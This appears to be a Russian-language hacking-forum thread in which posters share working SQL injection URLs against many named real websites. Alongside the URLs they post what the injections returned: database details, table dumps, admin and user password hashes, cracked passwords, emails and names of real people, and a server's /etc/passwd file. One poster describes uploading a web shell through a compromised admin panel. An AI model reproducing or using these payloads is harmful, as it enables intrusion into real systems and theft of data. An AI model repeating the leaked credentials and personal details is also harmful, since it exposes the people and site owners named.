http://www.inforealt.ru/content/?id=-1+union+select+1,concat(login,0x3a,passwd),3,4,5,6 ,7,8,9,10+from+sitexpert_users--

http://www.exclusivewebsolutions.co.uk/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x 3a,user())--
user(): web225-a-joo-133@localhost
version(): 5.0.67-community
database(): web225-a-joo-133

admin:5146ece4d7ee8bea2996a94aa5b4d72f:ltQAvqnDA0X CLWk0N2kI0Ns2qW9SWEry

PR = 2

http://www.seeleman.nl/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x 3a,user())--
user(): md106698db52069@blade27.geenpunt.nl
version(): 5.0.32-Debian_7etch6
database(): md106698db52069

admin:c30cc14f6a417d111ebac62c3fb38d66:M1Cw74qU76Q Wf9nem8O85DTQcFLU2kTz

Магазиинчик

http://www.colortek-shop.ru/instr_full.php?pub_id=-3%20UNION%20SELECT%201,concat_ws(0x3a,user(),versi on(),database()),3

version:: 5.0.32-Debian_7etch1-log
user::z40650_1@77.221.130.9
database:: z40650_1

http://www.newslook.ru/index.php?id=999999%20UNION%20SELECT%201,2,concat_ ws(0x3a,user(),version(),database()),4,5,6,7,8,9,1 0

version::5.0.67
user::newslook@localhost
database::newslook

Ultimate Collection of quality software!!!

http://www.sharewareriver.com/product.php?id=3318908098+union+select+1,2,3,4,5,6 ,7,concat_ws(0x3a,user(),version(),database()),9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23--


Database Version: 5.0.45-log
Database name: a0020843
User name: zoika@cgi1001.int.bizland.net

Database [a0020843]

Table [advertise (3 Rows)]
id
prod_id
cat_id
start_date
end_date
order_id
comments
Table [authors (25584 Rows)]
id
title
homepage
e_mail
regnow_id
PASSWORD
linked
shareit_id
subscribed
Table [categories (111 Rows)]
id
title
LEVEL
parent_id
display_order
Table [keywords (1 Rows)]
id
keywords
author_id
prod_id
show_price
shows
rnd
devisor
counter
start_date
payment
ballance
order_id
screenshot
comments
Table [kwd_reserve (3 Rows)]
id
keywords
price
deposit
date_added
e_mail
Table [order_urls (5123 Rows)]
id
prod_id
date_added
new_url
Table [products (71626 Rows)]
id
author_id
cat_id
title
version
platform
short_desc
long_desc
price
size
download_url
order_url
hits
hits0
rating
screenshot_url
date_added
featured
keywords
status
order_url0

Достаём юзеров лимитом их там за 25 косарей


http://www.sharewareriver.com/product.php?id=3318908098+UNION+SELECT+1,2,3,4,5,6 ,7,CONCAT(0x7873716C696E6A626567696E,(SELECT+CONCA T(id,0x7873716C696E6A64656C,title,0x7873716C696E6A 64656C,e_mail,0x7873716C696E6A64656C,PASSWORD)+FRO M+a0020843.authors+LIMIT+1,1),0x7873716C696E6A656E 64),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--


[1]:4:#1 ACE:admin@cyber-webcom.com:X2nJ9tBh
[2]:5:MeanFox:meanfox@meanfox.com:fwpfwpfw
[3]:6:10-Strike Software:dstep@mail.uln.ru:nRHP8Psg


Далее скучно.... :)


http://www.sharewareriver.com/product.php?id=3318908098+UNION+SELECT+1,2,3,4,5,6 ,7,CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2 F6574632F706173737764),0x7873716C696E6A656E64),9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23--


Читаем /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:101:65534::/var/lib/nfs:/bin/false
snmp:x:102:65534::/var/lib/snmp:/bin/false
ntp:x:103:103::/home/ntp:/bin/false
mysql:x:1000:104::/home/mysql:/bin/sh
exim:x:104:105::/var/spool/exim4:/bin/false
bacula:x:105:106:Bacula:/var/lib/bacula:/bin/false

gooody.at
http://www.gooody.at/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x 3a,user())

user(): db1070925-gooody
version(): 5.0.32-Debian_7etch8-log
database(): dbu1070925@localhost
PR=3

admin:4a03c8d6910be8db872e6dc4f70ee4ed:kouCfOZj8PY Kj690MgWP7BY7ljmthHtr


"Гостиный дом"
http://gostidom.com/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase())

user(): _bdgosti
version(): 5.0.45
database(): myroot@localhost

admin:7c2adff331c4807dd7d2d9dc0cd8bc10:08ayLZq2giq NZsBQDTf9xS2BXTGDmxqC

http://www.pre-trib.org/article-view.php?id=3809809832+union+select+1,2,concat_ws( 0x3a,user(),version(),database()),4,5,6,7,8--


User:web_user@localhost
Version:5.0.45-Debian_1ubuntu3.4-log
Database:pre_trib_new

/home/pre_trib/releases/20090114_220536/article-view.php

Достаём Рута

http://www.pre-trib.org/article-view.php?id=3809809832+union+select+1,2,concat_ws( 0x3a,user,password),4,5,6,7,8+from+mysql.user--


root:*85BCC49962DFC4BE4580D8D14155504478DC9461

http://www.ndsu.edu/wwwdev/ndsu_webcal/index.php?cid=-187%20union%20select%201,concat_ws(0x3a,lname,fnam e,email),3+from+administrators/*

https://www.lebow.drexel.edu/Newsroom/Newsletters/index.php?cid=-5+union+select+1,2,3,version(),5,6,7,8,9,10,11--

http://www.pemaquid.com/content-manager/story.php?cID=-86+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13--

http://www.latinoboxing.com/story.php?cid=-10382+union+select+1,2,3,4,version(),6--

http://www.ex-elec.com/files/firm.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24+from+users+limit+0,1--

хеш расшифровывается так: bigbear

войти под логином admin и пассом bigbear не удается =(
Кто сможет - черкните =)

https://www.bioinquire.com/product-profile.php?ID=-1+union+select+1,2,concat_ws(0x3a,email,userpass), 4,5,6,7,8,9,10,11,12+FROM+Tigeradmin_Users+limit+0 ,1+--

jeremy@jhousemedia.com:ta21XwWv/Yggk

чем пароль зашифрован - не могу понять?

http://www.detcenter.ru/index.php?str=-144+union+select+1,2,3,4,5,6,7,8,version(),10,11--http://www.sovtest.ru/news.php?id=125+and+1=0+union+select+1,convert(use r()+using+cp1251),3,4,5,6,7,8
Кто хоть что-нибудь дальше раскрутит киньте в ПМ хотя бы название таблы...на парочке есть phpbb, но то ли префиксов незнаем, то ли БД другая..

http://www.overclockers.co.uk/showproduct.php?prodid=CD-092-LO&groupid=701&catid=10&subcat=-314+union+select+user(),version(),database()/*

http://www.sitcom.co.uk/news/news.php?story=-000456+union+select+1,concat_ws(char(58),user(),ve rsion(),database()),3,4,5,6,7,8,9,10,11,12/*
sitcom_work@localhost
4.1.22-standard-log
sitcom_BSG

http://www.sitcom.co.uk/news/news.php?story=-000456+union+select+1,concat_ws(char(58),email,pas sword),3,4,5,6,7,8,9,10,11,12+from+users/*
contact@sitcom.co.uk:5ddadf914707c31330fa85b78ac3e 9e4:testing8
http://www.sitcom.co.uk/login/login.php

http://www.sff.co.uk/display_article.php?articleid=-160+union+select+1,binary(user()),3,4,binary(versi on()),6/*
sff_user@viki.clarkcomputers.co.uk
4.1.15-standard
SFF_prod

http://utf1.com/book.php?id=90980981563+union+select+1,2,concat_ws (0x3a,user(),version(),database())--


Version:4.1.22-standard
User:tw711co_man@localhost
Database:tw711co_movies

http://www.walkerbooks.com/books/catalog.php?key=909888422+union+select+1,2,3,4,con cat_ws(0x3a,user(),version(),database()),6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--


Database Version: 5.0.67-log
Database name: walkerco_booksDB
User name: walkerco_r@209.68.1.150

http://www.cool-wallpapers.net/tellwall.php?id=330988881+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,concat_ws(0x3a,user(),version(),data base()),30,31,32,33,34,35--


Вывод на картиночке -)

Database Version: 5.0.67-community
Database name: coolwall_fondos
User name: coolwall_coolwal@localhost


Нужное нам в количестве 1100

http://www.cool-wallpapers.net/tellwall.php?id=330988881+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,CONCAT(0x7873716C696E6A626567696E,(S ELECT+CONCAT(nombre,0x7873716C696E6A64656C,nick,0x 7873716C696E6A64656C,contrasena,0x7873716C696E6A64 656C,pais,0x7873716C696E6A64656C,email,0x7873716C6 96E6A64656C,code)+FROM+coolwall_fondos.usuarios+LI MIT+3,1),0x7873716C696E6A656E64),30,31,32,33,34,35--


[1]:Ricardo Hempel:rickhs:cosmic7:44:ricardo@prohost.cl:0iqzlj c1719eC6FKIkpX2
[2]:artek:masterartek:donkeykong:228:masterartek@yaho o.com:0wJAb4z1rZ3745pB1wMkF
[3]:Juan Carlos:Juank:kipipa:44:rickhs@gmail.com:0323DsZ4Nm PRK8122PUdr
итд....




МАГАЗИН КНИГ

http://www.bookpassage.com/article.php?id=9012345183+union+select+concat_ws(0 x3a,user(),version(),database()),2--


Database Version: 5.0.27-standard
Database name: Clients_Bookpassage
User name: Bookpassage@localhost

Это сами -)

Vineyard Gazette Online

http://www.mvgazette.com/gallery.php?4390888756/**/union/**/select/**/1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),da tabase()),10--


User:gazette_write@localhost
Version:5.0.51a-3ubuntu5.1
Database:gazette_online

http://ua.salvationchurch.com.ua/news?id=-243+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4,5

salvchurch_ua@beta
4.1.22-log
salvchurch_ua

http://sdl.com.ua/index.php?page=news_item&id=-78+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5

sdl@beta
4.1.22-log
sdl

http://www.selteq.com/tablename/sq_news_items/id/-247+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15

rssi_selteq@beta
4.1.22-log
rssi_selteq

http://razno.ru/out/?id=1796+union+select+concat_ws(0x3a,version(),dat abase(),user())

5.0.67-log
u10534
u10534@10.10.10.131

http://safarov.ru/06.php?act=news_by_id&news_id=-15208+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8--

iran@localhost
4.1.22-log
site_safarov

http://hcdynamo.com/?player&id=-1051+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,u ser(),version(),database()),10,11,12

hcdynamo@localhost
4.1.22-log
hcdynamodb

http://www.fract.org/forums/index.php?sujet=55237987987987+union+select+concat _ws(0x3a,user(),version(),database()),2,3,4,5--


Database Version: 4.0.24_Debian-10sarge1-log
Database name: fractal
User name: fractal@localhost



http://alternativeanswers.kefirtanesi.com/index.php?id=9088976331+union+select+1,2,3,4,conca t_ws(0x3a,user(),version(),database())--


Database Version: 5.0.67-log
Database name: mailarchive
User name: okul@qian2k.com



http://www.tv3o.com/episode.php?id=3809809870831+union+select+concat_w s(0x3a,user(),version(),database()),2,3,4--


User:tv3ouser@localhost
Version:4.1.20
Database:tv3o

https://www.bioinquire.com/product-profile.php?ID=-1+union+select+1,2,concat_ws(0x3a,email,userpass), 4,5,6,7,8,9,10,11,12+FROM+Tigeradmin_Users+limit+0 ,1+--

jeremy@jhousemedia.com:ta21XwWv/Yggk

чем пароль зашифрован - не могу понять?

Это DES(Unix)

www.boosthead.com
http://www.boosthead.com/product.php?id=-18+union+select+1,2,3,4,5,6,aes_decrypt(aes_encryp t(concat_ws(0x3a,user(),version()),0x71),0x71),8,9 ,10,11,12,13,14,15,16,17,18,19,20,21/*
boosthead1@66.33.219.67:4.1.16-standard-log

доступа к mysql.user,таблы не подбирал,но сомневаюсь что там есть что-нить интересное.


www.pitatel.ru
http://www.pitatel.ru/mclass.php?id=2+and+1=222+union+select+1,concat_ws (0x3a,user(),version(),database())+from+mysql.user/*
http://www.pitatel.ru/product.php?id=5811+AND+1=2+union+select+1,2,3,con cat_ws(0x3a,user(),version(),database()),5,6,7,8,9/*
root@localhost:4.0.22-standard:mysql
http://www.pitatel.ru/mclass.php?id=2+and+1=222+union+select+1,concat_ws (0x3a,user,password,host,file_priv)+from+mysql.use r/*
root::localhost:N
::localhost:N
::main.hs.orc.ru:N
root::main.hs.orc.ru:Y


http://www.twn.tuv.com
http://www.twn.tuv.com/english/news/news_details4.asp?cate=30&n_no=1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat _ws(0x3a,user(),database(),version()),13,14,15/*
administrator@localhost:tuv:4.0.15-nt-log
хмм...идём дальше...
http://www.twn.tuv.com/english/news/news_details4.asp?cate=30&n_no=1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat _ws(0x3a,user,password,host),13,14,15+from+mysql.u ser/*
root без пароля,жаль что localhost,смотри дальше...
http://www.twn.tuv.com/english/news/news_details4.asp?cate=30&n_no=1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat _ws(0x3a,user,password,host),13,14,15+from+mysql.u ser+limit+1,1/*
root::%
а это уже оч. интересно),смотрим дальше через лимит


::localhost
::%
administrator:6f413e564c08bbe7:localhost
administrator:6f413e564c08bbe7:%
webuser:7bd4ed7716dedbad:127.0.0.1
administrator:40d09e975f996754:10.160.15.84
administrator:40d09e975f996754:10.160.15.72
hct:40d09e975f996754:asktuv.twn.tuv.com
hct:40d09e975f996754:172.16.48.7
hct:40d09e975f996754:taipei-databases.twn.tuv.com
бывает.... :)

http://www.sex-shop-online.net/ndex.php?blockyid=catalog&cat=-1+union+select+concat_ws(0x3a3a,username,password) +from+pref_users--

http://www.sex-shop-online.net/admin/

login:admin
pass:tyeugdc


Админим магазин самотыков...

http://www.usadba.ru/city/flat/213123/?ddd
Unknown column '213123ddd' in 'where clause'


http://www.usadba.ru/city/flat/213123/? or 1=1-- - выполняется на ура
http://www.usadba.ru/city/flat/213123/? union select 1--
пишет

The used SELECT statements have a different number of columns


Количество полей так подобрать и не удалось.
Версия, выше 5й, т.к., information_schema присутствует

http://www.usadba.ru/city/flat/213123/?+AND+(select+*+from+information_schema.tables)=1--
-----
Operand should contain 21 column(s)


Вообщем, если кто сможет подобрать количество полей - отпишитесь пожалуйста.

CDKWeb
https://www.cdkweb.com/inthenewsdetails.php?id=-19+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7--
user(): cdkuser@localhost
version(): 4.1.22
database(): cdk
PR: 6
таблицы не подобрал((

Fortune Software
http://cfortune.kics.bc.ca/templates/chili.pepper/index.php?id=-19+union+select+1,2,concat(version(),0x3a,user(),0 x3a,database()),4,5,6--
user(): cfortune@localhost
version(): 5.0.51a-3ubuntu5.4
database(): cfortune
тИЦ: 10
PR: 4

таблиц куча:
c_reg_users
user
dating_users

из c_reg_users:
admin:bed128365216c019988915ed3add75fb
auctiontal:ba69897483886f0d2b0afb6345b76c0c

из user:
cfortune:jamocha
gina:gina
evemiranda:eve1

http://forge.mysql.com
http://forge.mysql.com/tools/search.php?sortby=(added_on*if(ascii(substring((se lect+version()+from+information_schema.tables+limi t+1,1),1,1))=53,1,-1))&sortorder=desc&page=9
Инъекция после ордер бай, крутить очень долго, даже со скриптами

p.s. история повторяется =)
http://forum.antichat.ru/showpost.php?p=520975&postcount=1

Для Военный , молодой человек..никогда не сдавайся
1.http://www.usadba.ru/city/flat/5481/?-1+order+by+5--

version()- 5.0.67
user() - real_user@zvm15.host.ru
database()-base_usadba

слепая скуля...поможет нам СИПТ небезизвестный... посимвольный брут и вуаля

с 1-16 стандартные таблички... а дальшe

Getted String number 17:a_flats

Getted String number 18:a_flats_arenda

Getted String number 19:a_houses

Getted String number 20:b_dormitory_arenda

Getted String number 21:drm_s_highway

Getted String number 22:l_house_area

Getted String number 23:l_house_informal

Getted String number 24:mmedia_city

Getted String number 25:mmedia_drm

Getted String number 26:mmedia_house

ну я думаю понятно...ковыряй дальше сам.... удачи

http://heyyou.ru/?page=proooblogs&id=-1+union+select+1,2,3,version(),5,6,7,8,9--

http://www.ypr.org.au/view_history.php?historyID=-6'+union+select+1,concat_ws(0x3a,USER(),DATABASE() ,VERSION())/*
User: ypr@localhost
Database: ypr_org_au
Version: 4.1.20

http://www.nihonjujutsu.com/history.php?HistoryID=-7+union+select+1,2,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),4,5,6/*
User: jujutsu@localhost
Database: jujutsu
Version: 5.0.32-Debian_7etch8-log

http://www.onegi.com.tw/AboutOneGi/History_Content.php?HistoryID=-2+union+select+1,2,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22%20--
User: onegi@localhost
Database: onegi
Version: 5.1.30-community

http://www.xinanchem.com/historyxiangxi.php?historyId=-143+union+select+1,2,concat_ws(0x3a,USER(),DATABAS E(),VERSION()),4,5/*
User: root@localhost
Database: wynca2
Version: 4.0.13-nt

http://www.wynca.com/en/historyxiangxi.php?historyId=-110+union+select+1,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),3,4,5/*
User: root@localhost
Database: wynca2
Version: 4.0.13-nt

http://www.welltec.com.hk/news_see.php?thisid=-18+union+select+1,2,concat_ws(0x3a,USER(),DATABASE (),VERSION()),4,5,6/*
User: root@localhost
Database: welltec_com_hk
Version: 5.0.26-community-nt

http://www.salmonsupporters.com/detailsupporters.php?thisid=-32+union+select+1,concat_ws(0x3a,USER(),DATABASE() ,VERSION()),3,4,5,6,7,8,9,10,11,12/*
User: wssDBadmin@208.109.181.3
Database: wssDBadmin
Version: 4.1.22-max-log

http://www.lyrics.nl/showsong.php?songid=28151&artiestid=552&historyid=-12632+UNION+SELECT+1,concat_ws(0x3a,USER(),DATABAS E(),VERSION()),3/*
User: filmenmu@localhost
Database: filmenmu
Version: 4.1.22

http://www.cosmos-ml.com/en/news_see.php?thisid=-1+UNION+SELECT+1,2,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),4,5,6/*
User: root@localhost
Database: dg_cosmos
Version: 5.0.26-community-nt

http://www.orcaschurch.org/Church_Notes.php?thisID=-28+union+select+1,2,concat_ws(0x3a,USER(),DATABASE (),VERSION()),4,5%20--
User: orcaschurch@localhost
Database: orcaschurch
Version: 5.0.58

http://www.gvchristian.com/videopopup.php?thisid=307+UNION+SELECT+1,concat_ws (0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,1 0/*
User: root@localhost
[b]Database:/b] fatguys_gvcc
Version: 5.0.45-Debian_1ubuntu3-log
Это за вчера =). Мои скули. Крутите...

http://www.directoryofpediatricians.com/details.php?id=37890797987631+union+select+1,2,3,4 ,5,6,7,8,9,concat_ws(0x3a,user(),version(),databas e())--


dofp_ab@localhost
4.1.22-standard
dofp_db

http://www.ecrush.com/loveadvice/index.php?cat=9&id=30709709878768531+union+select+1,2,3,4,5,6,conc at_ws(0x3a,user(),version(),database()),8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25--


Database Version: 5.0.46-enterprise-gpl-log
Database name: espin_dbo
User name: ecrush@172.20.65.64


http://www.poetryfoundation.org/journal/feature.html?id=18239776986986554+union+select+1,2 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_w s(0x3a,user(),version(),database()),20--


PageRank 7

Database Version: 5.0.32-Debian_7etch5-log
Database name: poetry
User name: test@10.0.0.1

http://carbonrecords.com/calendar/showevent.php?id=37798798798731+union+select+1,2,3 ,4,5,6,concat_ws(0x3a,user(),version(),database()) ,8--


User:carbonruby@nariko.dreamhost.com
Version:5.0.67-log
Database:carbonrecords


Ну и законченный магазинчик на вкусное -)

http://www.europanet.com.br/site/index.php?cat_id=32&pag_id=-13673+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,version(),4 5,46,47,48,49,50,51,52,53,54,55--


Database Version: 5.0.18-log
Database name: europanet
User name: arima@localhost

В общем там 38 Баз для всех пойдет и спам и аси кард итд...


Getting Data from table loja_admin (11 Rows) from database eurobest_commerce
Fields id_admin:usuario:senha:superadmin

[4]:9:carmina:5268582b6eaed9fee8a2658b4f57707a:0
[5]:10:luiz:ebea0b104bf6f36f1eb2ddc931d666ea:1
[6]:11:internet:b7b791e873f143d5318310e59022175d:1
[7]:12:claudia:5268582b6eaed9fee8a2658b4f57707a:0
[8]:13:joana:0ffbdca648adb61d5535ff063e70cb3f:1 пароль amidala
[9]:14:licia:63c193707ac085b2f8dd3115f546d6ed:0



Fields usuario:senha:admin_cat:admin_ftp

[1]:crnarciso:317a77f27ecd0390:0:
[2]:siqueira:0f1209ee38606424:0:
[3]:joice:0e9df198295e5bc8:0: Пароль joice
[4]:erick:350ef7027f408372:0:
[5]:ivan:323ef54f34efa5cb:4: Пароль 120585
[6]:diogo:081c619177dbefa1:0:
[7]:expedicao:6acea1340bfcbf5e:13:
[8]:manu:5210fdc242391e30:575:
[9]:livia:0ce5dd0f706534ab:600: Пароль fotografe
[10]:humberto:6460f98b14d0ae2e:572:/animeinvaders/
[11]:rodolfo:4151a9df6c9924ac:617:/motomax/
[12]:mariofit:136940302c5235c7:617: Пароль ducati
[13]:chris:2d2643c419314e1b:430:/sucesso/
[14]:gameblog:36dda20c5784bd81:825:
[15]:luiz:36dda20c5784bd81:832:/gameblog/
[16]:nelson:36dda20c5784bd81:834:/gameblog/
[17]:leandro:36dda20c5784bd81:831:/gameblog/
[18]:julebas:36dda20c5784bd81:830:/gameblog/
[19]:fhazevedo:36dda20c5784bd81:828:/gameblog/
[20]:sombrates:36dda20c5784bd81:835:/gameblog/
[21]:trivella:36dda20c5784bd81:836:/gameblog/
[22]:humberto_gb:36dda20c5784bd81:829:/gameblog/
[23]:aida:449a67e9524397b5:2:/natureza/ Пароль plantas
[24]:junior:63a09b66402d69ac:977:/xbox/
[25]:marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4:portugal FTP 200.229.132.34:21
[26]:adriano:44d383005b181d39:35: Пароль marley
[27]:luciane:26ae382f4d7de2e9:375:/sucesso/ Пароль lembrar
[28]:humbertoblog:36dda20c5784bd81:829:
[29]:flavia:36dda20c5784bd81:971:/gameblog/
[30]:gustavo:36dda20c5784bd81:970:/gameblog/

В общем самое важное было это залить шел..
Прошел в админку через тело

marco:36ad6fa45d632cd4:1:/ Пароль хэш MySQL:36ad6fa45d632cd4:portugal FTP 200.229.132.34:21

Ну и спокойно залил.
Далее раскопал конфиг там важная персона

// Database username
$phpAds_config['dbuser'] = 'arima';

// Database password
$phpAds_config['dbpassword'] = 'spectroman21';

Доступ ко всем базам!

save mode отключен -)

Наслаждайтесь.


PostgreSQL 7.2.7 on i686-pc-linux-gnu, compiled by GCC 2.96

http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,version()--&r=/list.php

http://www.elliottagency.co.uk/details.php?id=-258/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,TABLENAME/**/from/**/PG_TABLES+LIMIT+1,1--&r=/list.php

itemimages
CATEGORIES
items
pg_aggregate
pg_am
pg_amop
pg_amproc
pg_attrdef
pg_attribute
pg_xactlock
pg_type
pg_trigger
pg_statistic
pg_shadow
pg_rewrite
pg_relcheck
pg_proc
pg_operator
pg_opclass
pg_listener
pg_largeobject
pg_language
pg_inherits
pg_index
pg_group
pg_description
pg_database
pg_class

Дальше не могу может кто сможет....




DATAMP - Directory of American Tool and Machinery Patents

http://www.datamp.org/displayPatent.php?id=809809809809837107+union+sele ct+1,2,3,4,5,concat_ws(0x3a,user(),version(),datab ase()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24--&pn=15

Database Version: 5.0.67-community-nt
Database name: datamp
User name: datamp_owner@localhost





http://www.datamp.org/displayPatent.php?id=809809809809837107+UNION+SELE CT+1,2,3,4,5,CONCAT((SELECT+CONCAT(steward_id,user name,password,name,email)+FROM+datamp.data_steward s+LIMIT+19,1)),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24--



[1]:2:rbrendler:513eb98aea47a672a8f3536970b958fe:Ralp h Brendler:rebrendler@gmail.com
[2]:3:jjoslin:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff Joslin:datamp@joslin.ca
[3]:4:blpenn:a16aa06b2f0474f3a361be2bfadb9070:Brian Pennington:blpenn@attilathehun.com
[4]:5:sreynolds:d41d8cd98f00b204e9800998ecf8427e:Stev e Reynolds:s.e.reynolds@verizon.net
[5]:6:groberts:7db90444501f73dbb69c90ce7abdc329:Gary Roberts:groberts76@attbi.com
[6]:7:khays:eb416ed484bb765f198c8f43d95ccee8:Kirk Hays:khays@comcast.net
[7]:8:cswingle:d41d8cd98f00b204e9800998ecf8427e:Chris Swingley:cswingle@iarc.uaf.edu
[8]:9:jmcvey:0869cf46fd51daaf1ee9ad0a2d2dba6a:Jeff McVey:jmcvey123@msn.com
[9]:11:datchuck:61bc4419f39a648db27277c551367a5a:Jim Erdman:jlerdman@yahoo.com
[10]:13:cmatthews:1697d46fbd40f5fb68babd2776fd9d0a:Car l Matthews:vise27@gmail.com
[11]:14:dmcconnell:c4ce0603e30080fa5f54e59a94d7921f:Do n McConnell:donmccnnll@yahoo.com
[12]:15:rallen:5c40e218bd15cc65899c3ab8905c4656:Russ Allen:rrjallen@yahoo.com
[13]:16:sschulz:d44c2e495958b2062ae1049b20b4aa35:Stan Schulz:mvwcnews@neb.rr.com
[14]:17:motllahsram:5abf97a52e1d08577d1294d9a46d0988:T om Marshall:motllahsram@comcast.net
[15]:18:joelr:ca3df0a222b067dbce8712a979bc9145:Joel Havens:joelr4@verizon.net
[16]:19:murness:c6dafa4f1768d773a4a877f663b59629:Mike Urness:HD1933VLE@aol.com
[17]:20:tpobrienjr:dc787b140dc4fc95ec5fd3ee4e361c6d:To m O'Brien:tpobrienjr@earthlink.net
[18]:21:mwoodard:e15c0f3c29d61392357cbf71c9486e26:Mark Woodard:mark.woodard@nasa.gov
[19]:23:mconley:7ac80e96ae9183e4f5811924f0606203:Mark Conley:sawst2004@yahoo.com


Понравился вот этот ящик -) woodard@nasa.gov

интернет магазин аксессуаров и подарков
табла с паролями и мылами
http://eluxus.com.ua/catalog/index.php?_a=view&_cat=-73 UNION SELECT 1,2,concat_ws(char(58),email,password),4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM useraccounts --

админка
http://eluxus.com.ua/admin/
кто админ незнаю, ройте =)

магазин топмобила

http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,concat_ws(0x3a,USER(),DATABASE(),VERSION()), 5,6,7,8,9,10,11,12,13,14 --
version::5.0.67-community
user::shmel_admin@localhost
database::shmel_mobiles
Вывод всех таблиц
http://www.topmobila.com.ua/allg.php?id=-13 UNION SELECT 1,2,3,TABLE_NAME,5,6,7,8,9,10,11,12,13,14 FROM INFORMATION_SCHEMA.TABLES --

какой то Белорусский чат
http://www.irc.by/modules/articles/article.php?id=-16 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,USER(),DATABASE(),VERSI ON()),8,9,10,11,12,13,14,15,16,17,18,19,20 --
version::4.1.25
User::ircby_xoops@localhost
database::ircby_xoops

интернет бутик для женщин
http://all-perfumes.com.ua/index.php?act=cat&id=-66 UNION SELECT concat_ws(0x3a,USER(),DATABASE(),VERSION()),2,3,4, 5 --
version::4.1.12-standard-log
user::drnova_dnj0Pw3@localhost
database::drnova_apP4n1c7

Магазинчик -)

http://www.dare2livedog.com/detail.php?id=3687389798798761+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,concat_ws(0x3a,user(),ver sion(),database()),32--


Database Version: 5.0.67-community-log
Database name: zoomacti_products
User name: zoomacti_dare2li@localhost

Database [zoomacti_products]
Table [admin_settings (2 Rows)]
setting
value
Table [category (7 Rows)]
id
category
seo_title
seo_footer
Table [orders (254 Rows)]
order_id
orderdate
items
subtotal
shipping
tax
total
shipping_method
approved
transaction_id
first_name
last_name
phone
address
city
state
zip
country
shipping_first_name
shipping_last_name
shipping_address
shipping_city
shipping_state
shipping_zip
shipping_country
comments
giftwrap
gift_card_note
Table [products (1060 Rows)]
id
serial_number
name
descrip
slogan
color
size
category_id
subcategory_id
image
alt_tag
large_image
large_alt_tag
seo_title
seo_footer
active
Table [subcategory (33 Rows)]
id
category_id
subcategory
description
price
columns
sizes
header_image
header_alt_tag
image
small_alt_tag
seo_title
seo_footer
Table [users (127 Rows)]
userid
email
password
first_name
last_name
phone
address
city
state
zip
country
shipping_first_name
shipping_last_name
shipping_address
shipping_city
shipping_state
shipping_zip
shipping_country



